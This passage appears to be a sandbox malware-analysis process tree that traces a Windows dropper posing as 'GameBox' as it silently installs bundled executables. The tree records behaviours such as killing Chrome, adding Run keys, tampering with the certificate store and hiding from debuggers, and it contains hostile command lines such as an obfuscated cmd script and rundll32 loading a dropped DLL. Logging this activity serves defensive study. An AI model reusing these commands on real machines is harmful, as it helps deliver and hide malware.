                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282118 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                      6⤵
                                                        PID:1848
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:4000
                                                      • C:\Users\Admin\AppData\Local\Temp\is-NJ9FI.tmp\WEATHER Manager.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-NJ9FI.tmp\WEATHER Manager.tmp" /SL5="$1031E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:5232
                                                        • C:\Users\Admin\AppData\Local\Temp\is-VVHA1.tmp\Setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-VVHA1.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                          7⤵
                                                            PID:6472
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-VVHA1.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-VVHA1.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282118 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                              8⤵
                                                                PID:8776
                                                        • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                          "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5176
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            6⤵
                                                              PID:5344
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:6892
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Drops file in Program Files directory
                                                            PID:5128
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4772
                                                            • C:\Users\Admin\AppData\Local\Temp\is-7LDJJ.tmp\VPN.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-7LDJJ.tmp\VPN.tmp" /SL5="$10320,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5220
                                                              • C:\Users\Admin\AppData\Local\Temp\is-RIK8R.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-RIK8R.tmp\Setup.exe" /silent /subid=720
                                                                7⤵
                                                                  PID:5372
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-H83P3.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-H83P3.tmp\Setup.tmp" /SL5="$203AE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-RIK8R.tmp\Setup.exe" /silent /subid=720
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    • Modifies registry class
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:4692
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                      9⤵
                                                                        PID:8948
                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                          tapinstall.exe remove tap0901
                                                                          10⤵
                                                                          • Checks SCSI registry key(s)
                                                                          PID:8488
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                        9⤵
                                                                          PID:8624
                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                            10⤵
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Windows directory
                                                                            • Checks SCSI registry key(s)
                                                                            PID:5624
                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                          9⤵
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:7720
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            10⤵
                                                                              PID:7564
                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                            9⤵
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:8492
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:5316
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4372
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:5364
                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp994E_tmp.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\tmp994E_tmp.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:6088
                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                        "C:\Windows\System32\dllhost.exe"
                                                                        7⤵
                                                                          PID:4448
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                          7⤵
                                                                            PID:4448
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd
                                                                              8⤵
                                                                                PID:3900
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                  9⤵
                                                                                    PID:7904
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                    Esplorarne.exe.com i
                                                                                    9⤵
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:2976
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                      10⤵
                                                                                      • Drops startup file
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:7572
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping GFBFPSXA -n 30
                                                                                    9⤵
                                                                                    • Runs ping.exe
                                                                                    PID:5736
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5276
                                                                            • C:\Users\Admin\AppData\Roaming\1981202.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1981202.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:5476
                                                                            • C:\Users\Admin\AppData\Roaming\1396923.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1396923.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: SetClipboardViewer
                                                                              PID:1040
                                                                            • C:\Users\Admin\AppData\Roaming\7782614.exe
                                                                              "C:\Users\Admin\AppData\Roaming\7782614.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:6008
                                                                            • C:\Users\Admin\AppData\Roaming\5051953.exe
                                                                              "C:\Users\Admin\AppData\Roaming\5051953.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:2548
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5244
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3SJIR.tmp\MediaBurner2.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3SJIR.tmp\MediaBurner2.tmp" /SL5="$3030C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5428
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-5E3JK.tmp\3377047_logo_media.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-5E3JK.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                7⤵
                                                                                • Drops file in Drivers directory
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Drops file in Program Files directory
                                                                                PID:5972
                                                                                • C:\Program Files\Windows NT\TBZEKSRDLN\ultramediaburner.exe
                                                                                  "C:\Program Files\Windows NT\TBZEKSRDLN\ultramediaburner.exe" /VERYSILENT
                                                                                  8⤵
                                                                                    PID:8028
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-V9HT5.tmp\ultramediaburner.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-V9HT5.tmp\ultramediaburner.tmp" /SL5="$204A4,281924,62464,C:\Program Files\Windows NT\TBZEKSRDLN\ultramediaburner.exe" /VERYSILENT
                                                                                      9⤵
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:8092
                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                        10⤵
                                                                                          PID:7204
                                                                                    • C:\Users\Admin\AppData\Local\Temp\89-f4c6b-a8d-5d3a1-36c055cb09612\Qaegejozhaewe.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\89-f4c6b-a8d-5d3a1-36c055cb09612\Qaegejozhaewe.exe"
                                                                                      8⤵
                                                                                      • Checks computer location settings
                                                                                      PID:7228
                                                                                    • C:\Users\Admin\AppData\Local\Temp\97-33a08-e9d-c8292-c47e00e1b6a00\Gysobidyshi.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\97-33a08-e9d-c8292-c47e00e1b6a00\Gysobidyshi.exe"
                                                                                      8⤵
                                                                                        PID:7308
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ki4pkhq.1zb\GcleanerEU.exe /eufive & exit
                                                                                          9⤵
                                                                                            PID:7564
                                                                                            • C:\Users\Admin\AppData\Local\Temp\5ki4pkhq.1zb\GcleanerEU.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\5ki4pkhq.1zb\GcleanerEU.exe /eufive
                                                                                              10⤵
                                                                                                PID:1792
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1sy0fcmd.aug\installer.exe /qn CAMPAIGN="654" & exit
                                                                                              9⤵
                                                                                                PID:8300
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1sy0fcmd.aug\installer.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\1sy0fcmd.aug\installer.exe /qn CAMPAIGN="654"
                                                                                                  10⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Enumerates connected drives
                                                                                                  • Modifies system certificate store
                                                                                                  PID:8728
                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1sy0fcmd.aug\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1sy0fcmd.aug\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282118 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                    11⤵
                                                                                                      PID:8648
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0fwlww4.2si\ufgaa.exe & exit
                                                                                                  9⤵
                                                                                                    PID:8620
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f5zjjjo3.1kh\anyname.exe & exit
                                                                                                    9⤵
                                                                                                      PID:5460
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\f5zjjjo3.1kh\anyname.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\f5zjjjo3.1kh\anyname.exe
                                                                                                        10⤵
                                                                                                          PID:8260
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\f5zjjjo3.1kh\anyname.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\f5zjjjo3.1kh\anyname.exe" -q
                                                                                                            11⤵
                                                                                                              PID:5300
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mvgubfrn.pu2\gcleaner.exe /mixfive & exit
                                                                                                          9⤵
                                                                                                            PID:4212
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\mvgubfrn.pu2\gcleaner.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\mvgubfrn.pu2\gcleaner.exe /mixfive
                                                                                                              10⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              PID:2560
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ccdpo3r3.33q\autosubplayer.exe /S & exit
                                                                                                            9⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:6472
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    PID:5416
                                                                                                    • C:\Users\Admin\Documents\noPjANUvq_VXOgDzkOto18uS.exe
                                                                                                      "C:\Users\Admin\Documents\noPjANUvq_VXOgDzkOto18uS.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:6460
                                                                                                    • C:\Users\Admin\Documents\dSgYeoU46AZXePrTeZFbfP4c.exe
                                                                                                      "C:\Users\Admin\Documents\dSgYeoU46AZXePrTeZFbfP4c.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6448
                                                                                                    • C:\Users\Admin\Documents\2WZUOQuaeMn5SGt_2zYkjUhB.exe
                                                                                                      "C:\Users\Admin\Documents\2WZUOQuaeMn5SGt_2zYkjUhB.exe"
                                                                                                      6⤵
                                                                                                        PID:6916
                                                                                                      • C:\Users\Admin\Documents\y2j5oL5nn1M2nruW9w99Pijq.exe
                                                                                                        "C:\Users\Admin\Documents\y2j5oL5nn1M2nruW9w99Pijq.exe"
                                                                                                        6⤵
                                                                                                          PID:6940
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 660
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:6504
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 648
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4008
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 680
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:5744
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 652
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4472
                                                                                                        • C:\Users\Admin\Documents\fDWphefh3L2C6SDDOnSe73qU.exe
                                                                                                          "C:\Users\Admin\Documents\fDWphefh3L2C6SDDOnSe73qU.exe"
                                                                                                          6⤵
                                                                                                            PID:6996
                                                                                                          • C:\Users\Admin\Documents\CTHnMBnhXwsxTpTSfYNSxDd1.exe
                                                                                                            "C:\Users\Admin\Documents\CTHnMBnhXwsxTpTSfYNSxDd1.exe"
                                                                                                            6⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:7076
                                                                                                          • C:\Users\Admin\Documents\7tJvAVrWz1dQ2JTF7zRLfA5T.exe
                                                                                                            "C:\Users\Admin\Documents\7tJvAVrWz1dQ2JTF7zRLfA5T.exe"
                                                                                                            6⤵
                                                                                                              PID:7064
                                                                                                            • C:\Users\Admin\Documents\UwXqdj_dSTBhhNBdKUQuvJV7.exe
                                                                                                              "C:\Users\Admin\Documents\UwXqdj_dSTBhhNBdKUQuvJV7.exe"
                                                                                                              6⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:7060
                                                                                                              • C:\Users\Admin\Documents\UwXqdj_dSTBhhNBdKUQuvJV7.exe
                                                                                                                C:\Users\Admin\Documents\UwXqdj_dSTBhhNBdKUQuvJV7.exe
                                                                                                                7⤵
                                                                                                                  PID:7032
                                                                                                              • C:\Users\Admin\Documents\G6IyQLPi3foHIS9vbFe5fPYX.exe
                                                                                                                "C:\Users\Admin\Documents\G6IyQLPi3foHIS9vbFe5fPYX.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:6988
                                                                                                              • C:\Users\Admin\Documents\FixNqE7iDnsDdKnLQheAjllb.exe
                                                                                                                "C:\Users\Admin\Documents\FixNqE7iDnsDdKnLQheAjllb.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:6980
                                                                                                              • C:\Users\Admin\Documents\c_krmczlHy2nazXsaGapLZEG.exe
                                                                                                                "C:\Users\Admin\Documents\c_krmczlHy2nazXsaGapLZEG.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:6972
                                                                                                              • C:\Users\Admin\Documents\lRUBpJv2W6ayxTOCjkhgRe81.exe
                                                                                                                "C:\Users\Admin\Documents\lRUBpJv2W6ayxTOCjkhgRe81.exe"
                                                                                                                6⤵
                                                                                                                  PID:6260
                                                                                                                • C:\Users\Admin\Documents\edLYsooNRl8sMzVeuu8i_5N_.exe
                                                                                                                  "C:\Users\Admin\Documents\edLYsooNRl8sMzVeuu8i_5N_.exe"
                                                                                                                  6⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6412
                                                                                                                  • C:\Users\Admin\Documents\edLYsooNRl8sMzVeuu8i_5N_.exe
                                                                                                                    C:\Users\Admin\Documents\edLYsooNRl8sMzVeuu8i_5N_.exe
                                                                                                                    7⤵
                                                                                                                      PID:5336
                                                                                                                  • C:\Users\Admin\Documents\AdKcF2rFvrDX8ImV5v9TM88y.exe
                                                                                                                    "C:\Users\Admin\Documents\AdKcF2rFvrDX8ImV5v9TM88y.exe"
                                                                                                                    6⤵
                                                                                                                      PID:4788
                                                                                                                      • C:\Users\Admin\Documents\AdKcF2rFvrDX8ImV5v9TM88y.exe
                                                                                                                        "C:\Users\Admin\Documents\AdKcF2rFvrDX8ImV5v9TM88y.exe"
                                                                                                                        7⤵
                                                                                                                          PID:7352
                                                                                                                      • C:\Users\Admin\Documents\b7vWYeSt4SJtJNagyif3XzX4.exe
                                                                                                                        "C:\Users\Admin\Documents\b7vWYeSt4SJtJNagyif3XzX4.exe"
                                                                                                                        6⤵
                                                                                                                          PID:6552
                                                                                                                          • C:\Users\Admin\AppData\Roaming\7431396.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\7431396.exe"
                                                                                                                            7⤵
                                                                                                                              PID:7992
                                                                                                                            • C:\Users\Admin\AppData\Roaming\7300570.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\7300570.exe"
                                                                                                                              7⤵
                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                              PID:6880
                                                                                                                          • C:\Users\Admin\Documents\jLNK_l4laPFtYVAYReJ3DPKO.exe
                                                                                                                            "C:\Users\Admin\Documents\jLNK_l4laPFtYVAYReJ3DPKO.exe"
                                                                                                                            6⤵
                                                                                                                              PID:6596
                                                                                                                            • C:\Users\Admin\Documents\6H3Z8vWVSA4EKmUulPP9LVEP.exe
                                                                                                                              "C:\Users\Admin\Documents\6H3Z8vWVSA4EKmUulPP9LVEP.exe"
                                                                                                                              6⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:6696
                                                                                                                              • C:\Users\Admin\Documents\6H3Z8vWVSA4EKmUulPP9LVEP.exe
                                                                                                                                C:\Users\Admin\Documents\6H3Z8vWVSA4EKmUulPP9LVEP.exe
                                                                                                                                7⤵
                                                                                                                                  PID:5472
                                                                                                                                • C:\Users\Admin\Documents\6H3Z8vWVSA4EKmUulPP9LVEP.exe
                                                                                                                                  C:\Users\Admin\Documents\6H3Z8vWVSA4EKmUulPP9LVEP.exe
                                                                                                                                  7⤵
                                                                                                                                    PID:3724
                                                                                                                                • C:\Users\Admin\Documents\BjUgmeKbIF4UK1iqpsAit2n4.exe
                                                                                                                                  "C:\Users\Admin\Documents\BjUgmeKbIF4UK1iqpsAit2n4.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:3316
                                                                                                                                    • C:\Users\Admin\Documents\BjUgmeKbIF4UK1iqpsAit2n4.exe
                                                                                                                                      "C:\Users\Admin\Documents\BjUgmeKbIF4UK1iqpsAit2n4.exe" -q
                                                                                                                                      7⤵
                                                                                                                                        PID:4268
                                                                                                                                    • C:\Users\Admin\Documents\GkNaZsguCMnGcAO4v_QScZKK.exe
                                                                                                                                      "C:\Users\Admin\Documents\GkNaZsguCMnGcAO4v_QScZKK.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5472
                                                                                                                                    • C:\Users\Admin\Documents\5meHFweHaaQ0BkFB9gfgR1hr.exe
                                                                                                                                      "C:\Users\Admin\Documents\5meHFweHaaQ0BkFB9gfgR1hr.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:7376
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-282TC.tmp\5meHFweHaaQ0BkFB9gfgR1hr.tmp
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-282TC.tmp\5meHFweHaaQ0BkFB9gfgR1hr.tmp" /SL5="$404A8,138429,56832,C:\Users\Admin\Documents\5meHFweHaaQ0BkFB9gfgR1hr.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:7456
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SHNK0.tmp\Setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SHNK0.tmp\Setup.exe" /Verysilent
                                                                                                                                            8⤵
                                                                                                                                              PID:6552
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                9⤵
                                                                                                                                                  PID:8940
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:4092
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:5628
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:5168
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:5204
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:5032
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 626FF50703D262892636EFAB51169924 C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:7740
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding F6B02CACA1251056CFFB579D909997E2 C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:6364
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 8C99DE577B98F1FD6350FACF209462D7
                                                                                                                                    2⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:5000
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 8BF1B1DCDA184023FA73A538F50341F1 C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:9064
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:4616
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:4364
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
